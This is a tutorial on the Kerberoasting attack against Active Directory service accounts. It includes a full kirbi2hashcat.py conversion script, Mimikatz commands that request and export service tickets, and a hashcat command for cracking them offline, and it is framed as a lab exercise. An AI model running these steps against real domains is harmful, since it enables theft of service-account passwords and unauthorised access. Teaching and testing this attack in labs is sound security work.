Kerberoasting is an attack that allows a normal user to retrieve the hash of a service account and if a service account is configured with a weak password, the attacker will be able to retrieve a clear text password from the hash.
Why and How Kerberoasting is possible.
Kerberoasting is possible because of the architecture of Kerberos and because of users’ insecure behavior.
To understand exactly why and how kerberoasting works, you probably need to know how Kerberos works by itself.
Kerberoasting attack is focused on SPNs, Host-Based SPNs have 128 Character password which is changed every 30 days, but User Account SPN is something different, it’s “human-made” and often its password is weak, may never expire, and rarely change.
once the attacker has access to the account in the active directory, attacker will request ticket for the service.
DC Will generate TGS and Encrypt it with the service’s password.
DC Will pass this ticket to the user, at which point the attacker might extract it from memory and crack it offline.
Kerberoasting Demo
The simplest way to do Kerberoasting is using Mimikatz, you can do kerberoasting attacks in the laboratory that we have built.
you can get Mimikatz from here: https://github.com/gentilkiwi/mimikatz/
also, you might find GetSPN.ps1 script useful which will list you SPN Accounts
which you can get from here: https://github.com/compwiz32/PowerShell/blob/master/Get-SPN.ps1
and I personally love to use hashcat to crack hashes and I use script kirbi2hashcat.py which is written in python 2 to convert kirbi (extracted ticket) files to hashcat format, and you can copy script from here:
#!/usr/bin/env python
# Based on the Kerberoast script from Tim Medin to extract the Kerberos tickets
# from a kirbi file (https://github.com/nidem/kerberoast).
# https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/kirbi2john.py
# Modified by Laox to use with hashcat
from pyasn1.codec.ber import decoder
import sys
if __name__ == '__main__':
m = "exported mimikatz kerberos tickets"
if len(sys.argv) < 2:
sys.stderr.write("Usage: %s <%s>\n" % (sys.argv[0], m))
sys.exit(-1)
for f in sys.argv[1:]:
with open(f, 'rb') as fd:
data = fd.read()
if data[0] == '\x76': # process .kirbi
# rem dump
etype = str(decoder.decode(data)[0][2][0][3][0])
if etype != "23":
sys.stderr.write("Unsupported etype %s seen! Please report this to us.\n" % etype)
et = str(decoder.decode(data)[0][2][0][3][2])
sys.stdout.write("$krb5tgs$%s$" % etype + et[:16].encode("hex") +
"$" + et[16:].encode("hex") + "\n")
elif data[:2] == '6d':
for ticket in data.strip().split('\n'):
etype = str(decoder.decode(ticket.decode('hex'))[0][4][3][0])
if etype != "23":
sys.stderr.write("Unsupported etype %s seen! Please report this to us.\n" % etype)
et = str(decoder.decode(ticket.decode('hex'))[0][4][3][2])
sys.stdout.write("$krb5tgs$%s$" % etype + et[:16].encode("hex") +
"$" + et[16:].encode("hex") + "\n")
if you have all the tools ready, you can run Get-SPN.ps1 pick the target, once you do copy its SPN and open mimikatz.
now you can run in mimikatz:
kerberos::ask /target:SQLServer/sql.network.local:4112
which will require TGS from DC for you, you need to run:
kerberos::list /export
and TGSs from memory will be extracted in .kirbi files, pick the one that you need and copy it to your machine.
now we can crack it offline.
now call kirbi2hashcat.py script and pass kirbi file to it and save output in txt file like this:
python2 kirbi2hashcat.py 2-5124124123BLABLABLA.kirbi > hash.txt
now you’ve hash which is crackable with hashcat, to start cracking, run:
hashcat -m 13100 hash.txt yourwordlist.txt
after some time you’ll have ticket cracked which will give you clear text password for SPN Account.
And that was all for today’s kerberoasting guide, Happy Hacking.